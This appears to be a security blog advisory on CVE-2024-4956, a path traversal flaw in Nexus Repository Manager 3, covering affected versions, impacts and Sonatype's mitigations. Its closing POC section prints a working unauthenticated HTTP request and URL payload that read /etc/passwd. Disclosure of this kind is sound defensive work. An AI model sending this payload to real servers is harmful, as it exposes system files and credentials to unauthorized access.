Path Traversal In Nexus Repository Manager 3- CVE-2024–4956

Posted on

Vulnerable Version

versions 3.0 to 3.68.0

Fixed Version

version 3.68.1

Base Score

7.5 HIGH                                                                  

Vendor Description:-

Sonatype Nexus Repository Manager is a tool that stores and manages software artifacts like libraries, binary files, and dependencies. It’s used to build software and is available as open source and proprietary software.

CVE-2024–4956 Vulnerability Description:-

Path traversal, also known as directory traversal, is a web security vulnerability that allows an attacker to access directories and files on a server outside the web root directory. By manipulating variables that reference files with dot-dot-slash (../) sequences and their variations, attackers can navigate the server’s file system and potentially read sensitive files such as configuration files, user data, and application code.

For example, if a web application takes a file name as input and appends it to a directory path without proper validation, an attacker might input ../../etc/passwd to gain unauthorized access to the system’s password file.
This vulnerability allows an attacker to craft a URL to download system files outside the scope of the Nexus Repository application, without any authentication. This poses a significant risk as it can expose sensitive system files and potentially compromise the security of the environment where Nexus Repository is installed.

Impacts:-

  • Unauthorized File Access – Attackers can retrieve sensitive configuration files, API keys, credentials, and other critical data.
  • Potential Server Compromise – Exposure of sensitive files may lead to privilege escalation, lateral movement, or remote code execution (RCE).
  • Disruption & Data Breach – Could impact repository integrity, leak proprietary artifacts, or disrupt DevOps pipelines.

Mitigations:-

The official Sonatype support page of the vulnerability suggests upgrading to Nexus Repository version 3.68.1 or later. Download the latest version from here.

While Sonatype recommends upgrading, they understand immediate upgrades might not be feasible for all so here are their temporary mitigation options.

  1. Editing jetty.xml configuration:
  • Modify (basedir)/etc/jetty/jetty.xml by removing <Set name="resourceBase"><Property name="karaf.base"/>/public</Set>.
  • This disables file loading from the (installdir)/public directory, restricting certain functionalities.
  1. AWS WAF core rule adjustment:
  • If using AWS WAF, apply the GenericLFI_URIPATH rule to block malicious attempts.

POC

GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: /
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0

Or you can directly enter in url 

http://<target>//%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
image 3
image 5

POC video:-

Referenses:-

https://www.vicarius.io/vsociety/posts/path-traversal-in-sonatype-nexus-repository-3-cve-2024-4956

Leave a Reply

Your email address will not be published. Required fields are marked *